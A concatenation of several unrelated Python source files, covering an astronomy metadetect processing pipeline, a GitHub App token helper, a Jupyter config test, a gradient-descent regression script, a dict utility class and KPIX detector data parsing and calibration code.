msk = (
(arr['slice_y' + tail] >= slice_bnds["min_row"])
& (arr['slice_y' + tail] < slice_bnds["max_row"])
& (arr['slice_x' + tail] >= slice_bnds["min_col"])
& (arr['slice_x' + tail] < slice_bnds["max_col"])
)
arr["mask_flags" + tail][~msk] |= MASK_SLICEDUPE
msk = in_unique_coadd_tile_region(
ra=arr['ra' + tail],
dec=arr['dec' + tail],
crossra0=info['crossra0'],
udecmin=info['udecmin'],
udecmax=info['udecmax'],
uramin=info['uramin'],
uramax=info['uramax'],
)
arr["mask_flags" + tail][~msk] |= MASK_TILEDUPE
msk = (
((arr['bmask' + tail] & BMASK_EXPAND_GAIA_STAR) != 0)
| ((arr['bmask' + tail] & BMASK_GAIA_STAR) != 0)
)
arr["mask_flags" + tail][msk] |= MASK_GAIA_STAR
return arr
def _get_radec(*,
row,
col,
orig_start_row,
orig_start_col,
position_offset,
wcs):
"""
Convert image positions to sky positions
Parameters
----------
row: array
array of rows in slice coordinates
col: array
array of columns in slice coordinates
orig_start_row: float
Start row of origin of slice
orig_start_col: float
Start col of origin of slice
position_offset: int
Always 1 for DES WCS transforms
wcs: world coordinate system object
wcs for converting image positions to sky positions
Returns
-------
ra, dec arrays
"""
trow = np.array(row + orig_start_row + position_offset).astype(np.float64)
tcol = np.array(col + orig_start_col + position_offset).astype(np.float64)
ra, dec = wcs.image2sky(x=tcol, y=trow)
return ra, dec
def _post_process_results(
*, outputs, obj_data_list, image_info, buffer_size, central_size, config, info,
output_file, band_names,
):
# post process results
wcs_cache = {}
obj_data = obj_data_list[0]
output = []
dt = 0
missing_slice_inds = []
missing_slice_flags = []
for res, i, _dt, flags, band_inds in outputs:
dt += _dt
if res is None or res["noshear"] is None or res["noshear"].size == 0:
if res is None:
flags |= MASK_MISSING_MDET_RES
else:
flags |= MASK_MISSING_NOSHEAR_DET
missing_slice_inds.append(i)
missing_slice_flags.append(flags)
continue
for mdet_step, data in res.items():
if data is not None and data.size > 0:
file_id = max(obj_data['file_id'][i, 0], 0)
if file_id in wcs_cache:
wcs, position_offset = wcs_cache[file_id]
else:
wcs = eu.wcsutil.WCS(json.loads(image_info['wcs'][file_id]))
position_offset = image_info['position_offset'][file_id]
wcs_cache[file_id] = (wcs, position_offset)
coadd_dims = (wcs.get_naxis()[0], wcs.get_naxis()[1])
assert coadd_dims == (10000, 10000), (
"Wrong coadd dims %s computed!" % (coadd_dims,)
)
output.append(_make_output_array(
data=data,
slice_id=obj_data['id'][i],
mdet_step=mdet_step,
orig_start_col=obj_data['orig_start_col'][i, 0],
orig_start_row=obj_data['orig_start_row'][i, 0],
wcs=wcs,
position_offset=position_offset,
buffer_size=buffer_size,
central_size=central_size,
coadd_dims=coadd_dims,
model=config['model'],
info=info,
output_file=output_file,
band_names=band_names,
band_inds=band_inds,
nepoch_per_band=[od["nepoch"][i] for od in obj_data_list],
nepoch_eff_per_band=[od["nepoch_eff"][i] for od in obj_data_list],
))
if len(output) > 0:
# concatenate once since generally more efficient
output = np.concatenate(output)
assert len(wcs_cache) == 1
else:
output = None
# default to first slice if we find nothing
i = 0
file_id = max(obj_data['file_id'][i, 0], 0)
wcs = eu.wcsutil.WCS(json.loads(image_info['wcs'][file_id]))
position_offset = image_info['position_offset'][file_id]
coadd_dims = (wcs.get_naxis()[0], wcs.get_naxis()[1])
assert coadd_dims == (10000, 10000), (
"Wrong coadd dims %s computed!" % (coadd_dims,)
)
return (
output, dt, missing_slice_inds, missing_slice_flags, wcs,
position_offset, coadd_dims
)
def _truncate_negative_mfrac_weight(mbobs):
for obslist in mbobs:
for obs in obslist:
with obs.writeable():
msk = obs.mfrac < 0
if np.any(msk):
LOGGER.debug(
"truncating negative mfrac values: min %f",
obs.mfrac[msk].min(),
)
obs.mfrac[msk] = 0
msk = obs.weight < 0
if np.any(msk):
LOGGER.debug(
"truncating negative weight values: min %f",
obs.weight[msk].min(),
)
obs.weight[msk] = 0
def _write_mbobs_image(viz_dir, mbobs, islice, slug):
import proplot as pplt
nrows = sum([1 if len(mbobs[i]) > 0 else 0 for i in range(len(mbobs))])
ncols = 6
cmap = "rocket"
fig, axs = pplt.subplots(
nrows=nrows, ncols=ncols, refaspect=1, span=False,
)
for i in range(nrows):
if len(mbobs[i]) == 0:
continue
obs = mbobs[i][0]
ax = axs[i, 0]
ax.imshow(
np.arcsinh(obs.image * np.sqrt(obs.weight)),
cmap=cmap,
origin='lower',
)
ax.grid(False)
if i == 0:
ax.set_title("image")
ax.set_ylabel("band %d" % i)
ax = axs[i, 1]
ax.imshow(
obs.mfrac,
cmap=cmap,
origin='lower',
vmin=0,
vmax=obs.mfrac.max(),
)
ax.grid(False)
if i == 0:
ax.set_title("mfrac")
ax = axs[i, 2]
ax.imshow(
np.arcsinh(obs.bmask),
cmap=cmap,
origin='lower',
)
ax.grid(False)
if i == 0:
ax.set_title("bmask")
ax = axs[i, 3]
ax.imshow(
np.arcsinh(obs.ormask),
cmap=cmap,
origin='lower',
)
ax.grid(False)
if i == 0:
ax.set_title("ormask")
ax = axs[i, 4]
ax.imshow(
np.arcsinh(obs.noise),
cmap=cmap,
origin='lower',
)
ax.grid(False)
if i == 0:
ax.set_title("noise")
ax = axs[i, 5]
ax.imshow(
np.arcsinh(obs.weight),
cmap=cmap,
origin='lower',
vmin=0,
vmax=obs.weight.max(),
)
ax.grid(False)
if i == 0:
ax.set_title("weight")
fname = os.path.join(viz_dir, "mbobs%d%s.png" % (islice, slug))
os.makedirs(os.path.dirname(fname), exist_ok=True)
fig.savefig(fname)
def _preprocess_for_metadetect(preconfig, mbobs, gaia_stars, i, rng):
LOGGER.debug("preprocessing entry %d", i)
_truncate_negative_mfrac_weight(mbobs)
if gaia_stars is not None:
LOGGER.debug("masking GAIA stars")
mask_gaia_stars(mbobs, gaia_stars, preconfig['gaia_star_masks'], rng)
if preconfig is None:
return mbobs
else:
if "slice_apodization" in preconfig:
apply_apodization_corrections(
mbobs=mbobs,
ap_rad=preconfig["slice_apodization"]["ap_rad"],
mask_bit_val=BMASK_SLICE_APODIZED,
)
return mbobs
def _do_metadetect(config, mbobs, gaia_stars, seed, i, preconfig, shear_bands, viz_dir):
_t0 = time.time()
res = None
flags = 0
bandinds = []
nonshear_bandinds = []
if mbobs is not None:
if viz_dir is not None:
_write_mbobs_image(viz_dir, mbobs, i, "_raw")
rng = np.random.RandomState(seed=seed)
minnum = min([len(olist) for olist in mbobs])
if minnum > 0:
LOGGER.debug("preprocessing entry %d", i)
mbobs = _preprocess_for_metadetect(preconfig, mbobs, gaia_stars, i, rng)
if viz_dir is not None:
_write_mbobs_image(viz_dir, mbobs, i, "_preproc")
minnum = min([len(olist) for olist in mbobs])
if minnum > 0:
LOGGER.debug("running mdet for entry %d", i)
shear_mbobs = ngmix.MultiBandObsList()
nonshear_mbobs = ngmix.MultiBandObsList()
for iband, (obslist, is_shear_band) in enumerate(
zip(mbobs, shear_bands)
):
if is_shear_band:
shear_mbobs.append(obslist)
bandinds.append(iband)
else:
nonshear_mbobs.append(obslist)
nonshear_bandinds.append(iband)
if len(nonshear_mbobs) == 0:
nonshear_mbobs = None
try:
res = do_metadetect(
config,
shear_mbobs,
rng,
nonshear_mbobs=nonshear_mbobs,
)
except Exception as e:
LOGGER.debug("metadetect failed for slice %d: %s", i, repr(e))
flags |= MASK_MDET_FAILED
else:
LOGGER.debug(
"mbobs has no data for entry %d in one or more "
"bands after pre-processing: %s",
i,
[len(olist) for olist in mbobs],
)
flags |= MASK_MISSING_BAND_PREPROC
else:
LOGGER.debug(
"mbobs has no data for entry %d in one or more bands: %s",
i,
[len(olist) for olist in mbobs],
)
flags |= MASK_MISSING_BAND
else:
LOGGER.debug("mbobs is None for entry %d", i)
flags |= MASK_NOSLICE
return res, i, time.time() - _t0, flags, bandinds + nonshear_bandinds
def get_part_ranges(part, n_parts, size):
"""Divide a list of things of length `size` into `n_parts` and
retrurn the range for the given `part`.
Parameters
----------
part : int
The 1-indexed part.
n_parts : int
The total number of parts.
size : int
The length of the list of items to split into `n_parts`.
Returns
-------
start : int
The staring location.
num : int
The number of items in the part.
"""
n_per = size // n_parts
n_extra = size - n_per * n_parts
n_per = np.ones(n_parts, dtype=np.int64) * n_per
if n_extra > 0:
n_per[:n_extra] += 1
stop = np.cumsum(n_per)
start = stop - n_per
return start[part-1], n_per[part-1]
def _make_meds_iterator(mbmeds, start, num):
"""This function returns a function which is used as an iterator.
Closure closure blah blah blah.
TLDR: Doing things this way allows the code to only read a subset of the
images from disk in a pipelined manner.
This works because all of the list-like things fed to joblib are actually
generators that build their values on-the-fly.
"""
def _func():
for i in range(start, start+num):
mbobs = mbmeds.get_mbobs(i)
LOGGER.debug("read meds entry %d", i)
yield i, mbobs
return _func
def _load_gaia_stars(mbmeds, preconfig):
if 'gaia_star_masks' in preconfig:
gaia_config = preconfig['gaia_star_masks']
gaia_stars = load_gaia_stars(
mbmeds=mbmeds,
poly_coeffs=gaia_config['poly_coeffs'],
max_g_mag=gaia_config['max_g_mag'],
)
print("loaded GAIA star masks", flush=True)
else:
gaia_stars = None
return gaia_stars
def run_metadetect(
*,
config,
multiband_meds,
output_file,
mask_output_file,
seed,
preconfig,
start=0,
num=None,
n_jobs=1,
shear_bands=None,
verbose=100,
viz_dir=None,
band_names=None,
):
"""Run metadetect on a "pizza slice" MEDS file and write the outputs to
disk.
Parameters
----------
config : dict
The metadetect configuration file.
multiband_meds : `ngmix.medsreaders.MultiBandNGMixMEDS`
A multiband MEDS data structure.
output_file : str
The file to which to write the outputs.
mask_output_file : str
The file to write the healsparse mask to.
seed: int
Base seed for generating seeds
preconfig : dict
Proprocessing configuration. May contain gaia_star_masks
entry.
start : int, optional
The first entry of the file to process. Defaults to zero.
num : int, optional
The number of entries of the file to process, starting at `start`.
The default of `None` will process all entries in the file.
n_jobs : int, optional
The number of jobs to use.
shear_bands : list of bool or None, optional
If not None, this is a list of boolean values indicating if a given
band is to be used for shear. The length must match the number of MEDS
files used to make the `multiband_meds`.
verbose : int, optional
joblib logging level.
viz_dir : str, optional
If not None, write images of the slices to the given location.
band_names : list of str, optional
If given, the names of the bands as single strings to use in generating the
output data.
"""
t0 = time.time()
# process each slice in a pipeline
if num is None:
num = multiband_meds.size
if num + start > multiband_meds.size:
num = multiband_meds.size - start
if shear_bands is None:
shear_bands = [True] * len(multiband_meds.mlist)
if not any(shear_bands):
raise RuntimeError(
"You must have at least one band marked to be "
"used for shear in `shear_bands`!"
)
print('# of slices: %d' % num, flush=True)
print('slice range: [%d, %d)' % (start, start+num), flush=True)
meds_iter = _make_meds_iterator(multiband_meds, start, num)
gaia_stars = _load_gaia_stars(mbmeds=multiband_meds, preconfig=preconfig)
if n_jobs == 1:
outputs = [
_do_metadetect(
config, mbobs, gaia_stars, seed+i*256, i,
preconfig, shear_bands, viz_dir
)
for i, mbobs in PBar(meds_iter(), total=num)]
else:
outputs = joblib.Parallel(
verbose=verbose,
n_jobs=n_jobs,
pre_dispatch='2*n_jobs',
max_nbytes=None, # never memmap
)(
joblib.delayed(_do_metadetect)(
config, mbobs, gaia_stars, seed+i*256, i,
preconfig, shear_bands, viz_dir,
)
for i, mbobs in meds_iter()
)
# join all the outputs
meta = multiband_meds.mlist[0].get_meta()
if 'tile_info' in meta.dtype.names:
info = json.loads(meta["tile_info"][0])
else:
try:
info = json.loads(
multiband_meds.mlist[0]._fits['tile_info'].read().tobytes()
)
except Exception:
print(
"WARNING: tile info not found! attempting to read from the database!",
flush=True,
)
tilename = json.loads(
multiband_meds.mlist[0].get_image_info()['wcs'][0]
)['desfname'].split("_")[0]
info = get_coaddtile_geom(tilename)
pz_config = yaml.safe_load(meta['config'][0])
(
output, cpu_time, missing_slice_inds, missing_slice_flags,
wcs, position_offset, coadd_dims
) = _post_process_results(
outputs=outputs,
obj_data_list=[mle.get_cat() for mle in multiband_meds.mlist],
image_info=multiband_meds.mlist[0].get_image_info(),
buffer_size=int(pz_config['coadd']['buffer_size']),
central_size=int(pz_config['coadd']['central_size']),
config=config,
info=info,
output_file=output_file,
band_names=band_names,
)
# make the masks
msk_img, hs_msk = make_mask(
preconfig=preconfig,
gaia_stars=gaia_stars,
missing_slice_inds=missing_slice_inds,
missing_slice_flags=missing_slice_flags,
obj_data=multiband_meds.mlist[0].get_cat(),
buffer_size=int(pz_config['coadd']['buffer_size']),
central_size=int(pz_config['coadd']['central_size']),
wcs=wcs,
position_offset=position_offset,
coadd_dims=coadd_dims,
info=info,
)
# report and do i/o
wall_time = time.time() - t0
print(
"run time:",
str(datetime.timedelta(seconds=int(wall_time))),
flush=True,
)
print(
"CPU time:",
str(datetime.timedelta(seconds=int(cpu_time))),
flush=True,
)
print(
"CPU seconds per slice:",
cpu_time / num,
flush=True,
)
if output is not None:
with fitsio.FITS(output_file[:-len(".fz")], "rw", clobber=True) as fits:
fits.write(output, extname="cat")
fits.create_image_hdu(
img=None,
dtype="i4",
dims=msk_img.shape,
extname="msk",
header=pz_config["fpack_pars"])
fits["msk"].write_keys(pz_config["fpack_pars"], clean=False)
fits["msk"].write(msk_img)
# fpack it
try:
os.remove(output_file)
except FileNotFoundError:
pass
cmd = 'fpack %s' % output_file[:-len(".fz")]
print("fpack cmd:", cmd, flush=True)
try:
subprocess.check_call(cmd, shell=True)
except Exception:
pass
else:
try:
os.remove(output_file[:-len(".fz")])
except Exception:
pass
hs_msk.write(mask_output_file, clobber=True)
else:
print("WARNING: no output produced by metadetect!", flush=True)
|
the-stack_106_30613 | import jwt
import aiohttp
from datetime import datetime, timedelta, timezone
from jwt.utils import get_int_from_datetime
from auth import GITHUB_PEM_FILE, GITHUB_APP_ID
instance = jwt.JWT()
def new_jwt():
"""Generate a new JSON Web Token signed by RSA private key."""
with open(GITHUB_PEM_FILE, 'rb') as fp:
signing_key = jwt.jwk_from_pem(fp.read())
payload = {
'iat': get_int_from_datetime(datetime.now()),
'exp': get_int_from_datetime(datetime.now(timezone.utc) + timedelta(minutes=10)),
'iss': GITHUB_APP_ID
}
compact_jws = instance.encode(payload, signing_key, alg='RS256')
return compact_jws
async def new_token(_jwt):
authorization = f"Bearer {_jwt}"
headers = {
"Authorization": authorization,
"Accept": "application/vnd.github.v3+json"
}
url = f"https://api.github.com/app/installations/{GITHUB_APP_ID}/access_tokens"
print(url)
async with aiohttp.ClientSession() as session:
async with session.post(url, headers=headers) as resp:
print(resp.status)
token = await resp.read()
return token
async def get_installation(_jwt):
authorization = f"Bearer {_jwt}"
headers = {
"Authorization": authorization,
"Accept": "application/vnd.github.v3+json"
}
url = f"https://api.github.com/app/installations/{GITHUB_APP_ID}"
print(url)
async with aiohttp.ClientSession() as session:
async with session.get(url, headers=headers) as resp:
print(resp.status)
print(await resp.read())
|
the-stack_106_30617 | import json
import os
import shutil
import tempfile
from notebook.config_manager import BaseJSONConfigManager
def test_json():
tmpdir = tempfile.mkdtemp()
try:
with open(os.path.join(tmpdir, 'foo.json'), 'w') as f:
json.dump(dict(a=1), f)
# also make a foo.d/ directory with multiple json files
os.makedirs(os.path.join(tmpdir, 'foo.d'))
with open(os.path.join(tmpdir, 'foo.d', 'a.json'), 'w') as f:
json.dump(dict(a=2, b=1), f)
with open(os.path.join(tmpdir, 'foo.d', 'b.json'), 'w') as f:
json.dump(dict(a=3, b=2, c=3), f)
manager = BaseJSONConfigManager(config_dir=tmpdir, read_directory=False)
data = manager.get('foo')
assert 'a' in data
assert 'b' not in data
assert 'c' not in data
assert data['a'] == 1
manager = BaseJSONConfigManager(config_dir=tmpdir, read_directory=True)
data = manager.get('foo')
assert 'a' in data
assert 'b' in data
assert 'c' in data
# files should be read in order foo.d/a.json foo.d/b.json foo.json
assert data['a'] == 1
assert data['b'] == 2
assert data['c'] == 3
finally:
shutil.rmtree(tmpdir)
|
the-stack_106_30620 | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 20 10:17:03 2017
@author: fella
"""
from numpy import genfromtxt, array
def compute_error_for_given_points(b,m,points):
totalError = 0
for i in range(0, len(points)):
x = points[i,0]
y = points[i,1]
totalError += (y - (m * x + b)) **2
return totalError/ float(len(points))
def step_gradient(b_current, m_current, points, learning_rate):
#gradient descent
b_gradient = 0
m_gradient = 0
# b_current = new_b
# m_current = new_m
N = float(len(points))
for i in range(0, len(points)):
x = points[i,0]
y = points[i,1]
b_gradient += -(2/N) * (y - (m_current * x + b_current ))
m_gradient += -(2/N) * x * (y - (m_current * x + b_current ))
new_b = b_current - (learning_rate * b_gradient)
new_m = m_current - (learning_rate * m_gradient)
return [new_b, new_m]
def gradient_descent_runner(points, initial_b, initial_m, learning_rate,num_iterations):
b = initial_b
m = initial_m
for i in range(num_iterations):
b,m = step_gradient(b,m,array(points), learning_rate)
return [b, m]
def run():
points = genfromtxt(r'C:\Users\fella\Desktop\Documents\5. Python\Tutorials\linear_regression_live\data.csv', delimiter=',' )
#hyperparameters
learning_rate = 0.0001
#y = mx + b (slope formula)
initial_b = 0
initial_m = 0
num_iterations = 1000
[b,m] = gradient_descent_runner(points, initial_b, initial_m, learning_rate,num_iterations)
print(b)
print(m)
if __name__ == '__main__':
run()
|
the-stack_106_30621 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
"""
集合类工具
"""
from typing import Any
from collections import UserDict
class FancyDict(dict):
def __getattr__(self, key: str) -> Any:
try:
return self[key]
except KeyError as k:
raise AttributeError(k)
def __setattr__(self, key: str, value: Any):
# 内建属性不放入 key 中
if key.startswith("__") and key.endswith("__"):
super().__setattr__(key, value)
else:
self[key] = value
def __delattr__(self, key: str):
try:
del self[key]
except KeyError as k:
raise AttributeError(k)
class ConstantDict(dict):
"""ConstantDict is a subclass of :class:`dict`, implementing __setitem__
method to avoid item assignment::
>>> d = ConstantDict({'key': 'value'})
>>> d['key'] = 'value'
Traceback (most recent call last):
...
TypeError: 'ConstantDict' object does not support item assignment
"""
def __setitem__(self, key: str, value: Any):
raise TypeError(
"'%s' object does not support item assignment" % self.__class__.__name__
)
|
the-stack_106_30622 | import rogue
import pyrogue
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
from collections import defaultdict
from collections import Counter
import ctypes
#import line_profiler
import pprint
pp = pprint.PrettyPrinter(indent=2)
nesteddict = lambda:defaultdict(nesteddict)
c_uint = ctypes.c_uint
class KpixSampleRaw(ctypes.LittleEndianStructure):
_fields_ = [
('row', c_uint, 5), #4:0
('col', c_uint, 5), #9:5
('bucket', c_uint, 2), #11:10
('triggerFlag', c_uint, 1), #12
('rangeFlag', c_uint, 1), #13
('badCountFlag', c_uint, 1), #14
('emptyFlag', c_uint, 1), #15
('kpixId', c_uint, 12), #27:16
('type', c_uint, 4), #31:28
('adc', c_uint, 13), #44:32
('dmy2', c_uint, 3), #47:45
('timestamp', c_uint, 13), #60:48
]
_pack_ = 1
class KpixSample(ctypes.Union):
_anonymous_ = ('fields',)
_fields_ = [
('fields', KpixSampleRaw),
('asWord', ctypes.c_uint64),]
def __init__(self, word):
self.asWord = word
def toInt(ba):
return int.from_bytes(ba, 'little')
def getField(value, highBit, lowBit):
mask = 2**(highBit-lowBit+1)-1
return (value >> lowBit) & mask
def parseSample(ba, timestamp):
#baSwapped = np.array([ba[4], ba[5], ba[6], ba[7], ba[0], ba[1], ba[2], ba[3]])
value = int.from_bytes(ba, 'little', signed=False)
d = {}
d['type'] = getField(value, 31, 28)
d['kpixId'] = getField(value, 27, 16)
if d['type'] == 3:
d['firstRuntime'] = getField(value, 63, 32)
elif d['type'] == 1:
d['temperature'] = getField(value, 39, 32)
d['count'] = getField(value, 63, 56)
elif d['type'] == 2:
d['acquisitionTime'] = getField(value, 63, 32)
d['bunchCount'] = getField(value, 15, 3)
d['subCount'] = getField(value, 2, 0)
d['absoluteTime'] = ((d['acquisitionTime']+timestamp))
else:
d['row'] = getField(value, 4, 0)
d['col'] = getField(value, 9, 5)
d['bucket'] = getField(value, 11, 10)
d['triggerFlag'] = getField(value, 12, 12)
d['rangeFlag'] = getField(value, 13, 13)
d['badCountFlag'] = getField(value, 14, 14)
d['emptyFlag'] = getField(value, 15, 15)
d['adc'] = getField(value, 44, 32)
d['timestamp'] = getField(value, 60, 48)
return d
#@profile
def parseFrame(ba):
frameSizeBytes = len(ba)
numSamples = int((frameSizeBytes-32-4)/8)
timestamp = int.from_bytes(ba[4:12], 'little')
eventNumber = int.from_bytes(ba[0:4], 'little')
d = {}
d['runtime'] = timestamp
d['eventNumber'] = eventNumber
d['samples'] = nesteddict()
kpixCounter = Counter()
print(f'Parsing frame {eventNumber}, timestamp: {timestamp}, {numSamples} samples')
rawSamples = ba[32:-4]
data = (rawSamples[i:i+8] for i in range(0, len(rawSamples), 8))
runtimes = []
timestampCount = 0
for raw in data:
sample = parseSample(raw, timestamp)
if sample['type'] == 2:
print(sample)
timestampCount += 1
if sample['type'] == 3:
print(f"Found runtime sample: {sample['kpixId']} {sample['firstRuntime']:#08x} diff: {sample['firstRuntime']-(timestamp&0xFFFFFFFF)}")
if sample['type'] == 0:
kpixCounter[sample['kpixId']] += 1
print(f'Got {timestampCount} timestamps')
print(kpixCounter)
return d
# if sample['kpixId'] == 24:
# print(f'Found local kpix sample: {sample}')
# elif sample['type'] == 3:
#print(f"Found runtime sample: {sample['kpixId']} {sample['firstRuntime']:#08x} diff: {sample['firstRuntime']-(timestamp&0xFFFFFFFF)}")
# if sample['kpixId'] != 24:
# runtimes.append(sample)
# else:
# pass
#d['samples'][sample['kpixId']][sample['bucket']][sample['row']][sample['col']] = sample['adc']
#print(f'Normal sample: {sample}')
#print(f'All Runtimes: {runtimes}')
s = set((x['firstRuntime']-d['runtime'] for x in runtimes))
#print(f'Runtimes: {s}')
if len(s) != 1:
print('-----')
print("Runtimes do not match!")
for r in runtimes:
print(r)
print('-----')
return d
class KpixStreamInfo(rogue.interfaces.stream.Slave):
def __init__(self, ):
rogue.interfaces.stream.Slave.__init__(self)
def _acceptFrame(self, frame):
if frame.getError():
print('Frame Error!')
return
ba = bytearray(frame.getPayload())
frame.read(ba, 0)
print(f'Got Frame on channel {frame.getChannel()}: {len(ba)} bytes')
if frame.getChannel() == 0:
d = parseFrame(ba)
print(d)
# for k, kpix in d['samples'].items():
# print(k)
# if k == 24: continue
# print(f'Kpix: {k}')
# for b, bucket in kpix.items():
# print(f'Bucket: {b}')
# for r, row in bucket.items():
# l = []
# for c in range(32):
# if c not in row:
# l.append(' ')
# else:
# l.append(f'{row[c]:04x} ')
# print(''.join(l))
class KpixRunAnalyzer(rogue.interfaces.stream.Slave):
def __init__(self):
rogue.interfaces.stream.Slave.__init__(self)
self.parsedData = []
def _acceptFrame(self, frame):
if frame.getError():
print('Frame Error!')
return
ba = bytearray(frame.getPayload())
frame.read(ba, 0)
if frame.getChannel() == 0:
self.parsedData.append(parseFrame(ba))
else:
print('Got YAML Frame')
def process(self):
#data = [[[[] for bucket in range(4)] for chanel in range(1024)] for kpix in range(24)]
self.dictData = nesteddict()
for frame in self.parsedData:
runtime = frame['runtime']
for sample in frame['data']:
print(sample)
kpix = sample['kpixId']
channel = sample['col']*32+sample['row']
bucket = sample['bucket']
adc = sample['adc']
self.dictData[kpix][channel][bucket][runtime] = adc
def noise(self):
for kpix, channels in self.dictData.items():
for channel, buckets in channels.items():
for bucket, adcs in buckets.items():
a = np.array(list(adcs.values()))
buckets[bucket]['mean'] = np.mean(a)
buckets[bucket]['noise'] = np.std(a)
class KpixCalibration(rogue.interfaces.stream.Slave):
def __init__(self):
rogue.interfaces.stream.Slave.__init__(self)
#self.CalState = 'Idle'
#self.CalChannel = 0
#self.CalDac = 0
self.state = {}
self.dataDict = nesteddict()
#self.runtimes = nesteddict()
#self.injections = {}
#self.baselines = {}
#self.counts = {}
self.frameCount = 0
#self.sampleCount = 0
#@profile
def _acceptFrame(self, frame):
if frame.getError():
print('Frame Error!')
#return
#if self.state["DesyTrackerRoot"]["DesyTrackerRunControl"]['CalState'] == "Inject":
# return
ba = np.zeros(frame.getPayload(), dtype=np.uint8)
frame.read(ba, 0)
# active = set([0,6])
# done = []
if frame.getChannel() == 0:
runControlDict = self.state["DesyTrackerRoot"]["DesyTrackerRunControl"]
calState = runControlDict['CalState']
calChannel = runControlDict['CalChannel']
calDac = runControlDict['CalDac']
#calMeanCount = runControlDict['CalMeanCount']
#calDacCount = runControlDict['CalDacCount']
#numDacs = (runControlDict['CalDacMax']-runControlDict['CalDacMin'])/runControlDict['CalDacStep']
#dacCount = runControlDict['CalDacCount']
#parsedFrame = parseFrame(ba)
self.frameCount += 1
sample = KpixSample(0)
#(rawSamples[i:i+8] for i in range(0, len(rawSamples), 8))
data = ba[32:-4]
#size = len(data)
dv = data.view()
dv.shape = (len(data)//8, 8)
runtime = int.from_bytes(ba[4:12], 'little')
print(f'Got Data Frame. Runtime: {runtime}')
#print(f'CalState: {calState.__dict__}')
for seg in dv:
#word =
#self.sampleCount += 1
#sample.asWord = int.from_bytes(seg, 'little', signed=False)
sample.asWord = seg.ctypes.data_as(ctypes.POINTER(ctypes.c_uint64)).contents.value
#print(f'Kpix: {sample.fields.kpixId}, row: {sample.fields.row}, col: {sample.fields.col}, bucket: {sample.fields.bucket}')
if sample.fields.type != 0:
continue # Temperature type
fields = sample.fields
channel = fields.col*32 + fields.row
kpix = fields.kpixId
bucket = fields.bucket
adc = fields.adc
#print(f'Got sample: kpix: {kpix}, channel {channel}, bucket: {bucket}, adc: {adc}')
if calState == 'Baseline':
pass
#if kpix not in self.baselines:
#self.baselines[kpix] = np.zeros([1024, 4, calMeanCount], dtype=np.uint16)
#self.counts[kpix] = np.zeros([1024,4], dtype=np.uint8)
# dict cheat
# This works
#self.dataDict[kpix][channel][bucket]['baseline']['data'][runtime] = adc
#count = self.counts[kpix][channel, bucket]
#print(f'Kpix: {kpix}, channel: {channel}, bucket: {bucket}, type: {sample.fields.type}, adc: {adc}')
#self.baselines[kpix][channel, bucket, count] = adc
#self.counts[kpix][channel, bucket] = count + 1
elif calState == 'Inject':
#if kpix not in self.injections:
# self.injections[kpix] = np.zeros([1024, 4, 256, calDacCount], dtype=np.uint16)
# self.counts[kpix] = np.zeros([1024, 4, 256], dtype=np.uint8)
if channel == calChannel:
#count = self.counts[kpix][channel, bucket, calDac]
#print(f'Kpix: {kpix}, channel: {channel}, bucket: {bucket}, dac: {calDac}, count: {count}, type: {sample.fields.type}')
#self.injections[kpix][channel, bucket, calDac, count] = adc
#self.counts[kpix][channel, bucket, calDac] = count + 1
if len(self.dataDict[kpix][channel][bucket]['injection'][calDac]) > 0:
print(f"Current: {self.dataDict[kpix][channel][bucket]['injection'][calDac]}")
print(f'New sample: kpix: {kpix}, channel {channel}, bucket: {bucket}, adc: {adc}')
self.dataDict[kpix][channel][bucket]['injection'][calDac][runtime] = adc
elif frame.getChannel() == 6:
print("Got YAML Frame")
yamlString = bytearray(ba).rstrip(bytearray(1)).decode('utf-8')
yamlDict = pyrogue.yamlToData(yamlString)
#print(yamlDict)
pyrogue.dictUpdate(self.state, yamlDict)
else:
print(f'Got frame from channel: {frame.getChannel()}')
# print(
def baselines(self):
ret = nesteddict()
for kpix, channels in self.dataDict.items():
for channel, buckets in channels.items():
for bucket, b in buckets.items():
a = np.array(list(b['baseline']['data'].values()))
mean = np.mean(a)
std = np.std(a)
b['baseline']['mean'] = mean
b['baseline']['std'] = std
ret[kpix][channel][bucket] = (mean, std)
print(f"Channel {channel}, bucket {bucket}: mean = {mean}, std = {std}")
return ret
def plot_baseline_heatmaps(self, kpix):
fig = plt.figure(1)
plt.xlabel('Channel')
plt.ylabel('ADC')
plt.title('Baseline historam all channels')
for bucket in range(4):
d = self.baselines[kpix][:, bucket]
ymin = np.min(d)
ymax = np.max(d)
print(f'minAdc={ymin}, maxAdc={ymax}')
bins = list(range(ymin, ymax+1))
# Create a histogram for each channel
h2d = np.array([np.histogram(x, bins=bins)[0] for x in d])
zmax = np.max(h2d)
zmin = np.min(h2d)
print(f'minHits={zmin}, maxHits={zmax}')
ax = fig.add_subplot(4, 1, bucket+1)
#plt.title(f'Bucket {bucket}')
img = ax.imshow(h2d.T, vmin=zmin, vmax=zmax, extent=[0, len(h2d), ymin, ymax], aspect='auto')
fig.colorbar(img)
plt.show()
def plot_baseline_heatmaps_dict(self, kpix):
fig = plt.figure()
fig.suptitle('Baseline historam all channels')
for bucket in range(4):
keys = self.dataDict[kpix].keys()
d = [list(self.dataDict[kpix][channel][bucket]['baseline']['data'].values()) for channel in keys]
d = np.array(d)
ymin = np.min(d)
ymax = np.max(d)
bins = list(range(ymin, ymax+1))
# Create a histogram for each channel
h2d = np.array([np.histogram(x, bins=bins)[0] for x in d])
zmax = np.max(h2d)
zmin = np.min(h2d)
print(f'minHits={zmin}, maxHits={zmax}')
ax = fig.add_subplot(4, 1, bucket+1)
ax.set_title(f'Bucket {bucket}')
ax.set_xlabel('Channel')
ax.set_ylabel('ADC')
img = ax.imshow(h2d.T, vmin=zmin, vmax=zmax, extent=[0, len(h2d), ymin, ymax], aspect='auto')
plt.colorbar(img, ax=ax)
plt.show()
def plot_injection_fit(self, kpix, channel):
plt.figure(1)
plt.xlabel('DAC')
plt.ylabel('ADC')
plt.title(f'Calibration fits for channel {channel}')
for bucket in range(4):
plt.subplot(4, 1, bucket+1)
